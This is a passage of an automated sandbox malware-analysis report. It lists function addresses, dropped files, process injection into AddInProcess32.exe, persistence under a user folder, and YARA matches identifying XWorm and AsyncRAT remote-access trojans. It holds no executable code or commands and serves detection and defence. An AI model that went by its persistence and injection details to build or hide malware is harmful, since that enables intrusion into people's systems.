Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E68D60	4_2_00007FFD93E68D60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6B360	4_2_00007FFD93E6B360
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E63B60	4_2_00007FFD93E63B60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E65140	4_2_00007FFD93E65140
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E68120	4_2_00007FFD93E68120
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67520	4_2_00007FFD93E67520
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E61F00	4_2_00007FFD93E61F00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E63D00	4_2_00007FFD93E63D00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6A6C0	4_2_00007FFD93E6A6C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E614C0	4_2_00007FFD93E614C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E682B0	4_2_00007FFD93E682B0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E6B2A2	4_2_00007FFD93E6B2A2
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E66C70	4_2_00007FFD93E66C70
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E65860	4_2_00007FFD93E65860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD93E67860	4_2_00007FFD93E67860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94266C70	4_2_00007FFD94266C70
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94265860	4_2_00007FFD94265860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267860	4_2_00007FFD94267860
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426A6C0	4_2_00007FFD9426A6C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD942614C0	4_2_00007FFD942614C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD942682B0	4_2_00007FFD942682B0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426B2A2	4_2_00007FFD9426B2A2
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94261F00	4_2_00007FFD94261F00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94263D00	4_2_00007FFD94263D00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94265140	4_2_00007FFD94265140
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94268120	4_2_00007FFD94268120
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267520	4_2_00007FFD94267520
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267F80	4_2_00007FFD94267F80
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94268D60	4_2_00007FFD94268D60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426B360	4_2_00007FFD9426B360
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94263B60	4_2_00007FFD94263B60
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267BC0	4_2_00007FFD94267BC0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426A800	4_2_00007FFD9426A800
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94263A00	4_2_00007FFD94263A00
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94266440	4_2_00007FFD94266440
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94266432	4_2_00007FFD94266432
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9426B030	4_2_00007FFD9426B030
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94267A20	4_2_00007FFD94267A20
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94645F80	4_2_00007FFD94645F80
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD945EF980	4_2_00007FFD945EF980
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94640640	4_2_00007FFD94640640
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94619460	4_2_00007FFD94619460
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946E1530	4_2_00007FFD946E1530
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94605760	4_2_00007FFD94605760
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946DB7F0	4_2_00007FFD946DB7F0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94669100	4_2_00007FFD94669100
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946151C0	4_2_00007FFD946151C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946152C0	4_2_00007FFD946152C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94646800	4_2_00007FFD94646800
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9462B280	4_2_00007FFD9462B280
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD9468F340	4_2_00007FFD9468F340
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946D9320	4_2_00007FFD946D9320
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA3845570	4_2_00007FFDA3845570
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFDA3844E50	4_2_00007FFDA3844E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_0262D504	5_2_0262D504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_06621F38	5_2_06621F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 5_2_06622C79	5_2_06622C79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 7_2_00B80EC0	7_2_00B80EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 8_2_01030EC0	8_2_01030EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 12_2_01830EC0	12_2_01830EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 18_2_01900EC0	18_2_01900EC0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9277F980	21_2_00007FFD9277F980
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD92869320	21_2_00007FFD92869320
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9281F340	21_2_00007FFD9281F340
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD927BB280	21_2_00007FFD927BB280
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD927A52C0	21_2_00007FFD927A52C0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9279B420	21_2_00007FFD9279B420
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD927F9100	21_2_00007FFD927F9100
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A5A10	21_2_00007FFD9B1A5A10
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B19E8F0	21_2_00007FFD9B19E8F0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1AC040	21_2_00007FFD9B1AC040
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1AAE90	21_2_00007FFD9B1AAE90
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1B5EA0	21_2_00007FFD9B1B5EA0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A1EA0	21_2_00007FFD9B1A1EA0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A5F10	21_2_00007FFD9B1A5F10
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B197DF0	21_2_00007FFD9B197DF0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1B2C80	21_2_00007FFD9B1B2C80

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: String function: 00007FFD945EF980 appears 98 times
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: String function: 00007FFD946E9E50 appears 98 times

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 380 -s 76

PE file does not import any functions

Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: pKxhpP0spW.exe, 00000001.00000000.2370966893.00007FF71D0DB000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenameIhagutayetovafuniji.exe4 vs pKxhpP0spW.exe

Yara signature match

Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514a8258.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 6.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d6384cc49.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145149f099.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145144cba9.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c252b9.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.21451455d68.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145144cba9.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514d2119.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65ca92a1.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d63855e08.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c2e478.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.21451455d68.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d65c252b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.2145149f099.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514a8258.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 21.2.motor1.exe.214514d2119.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.2466557767.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000015.00000002.2599478044.0000021451486000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2541006692.0000022D65C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2540642308.0000022D6382C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d63855e08.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65c2e478.3.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d6384cc49.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.motor1.exe.22d65ca92a1.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'

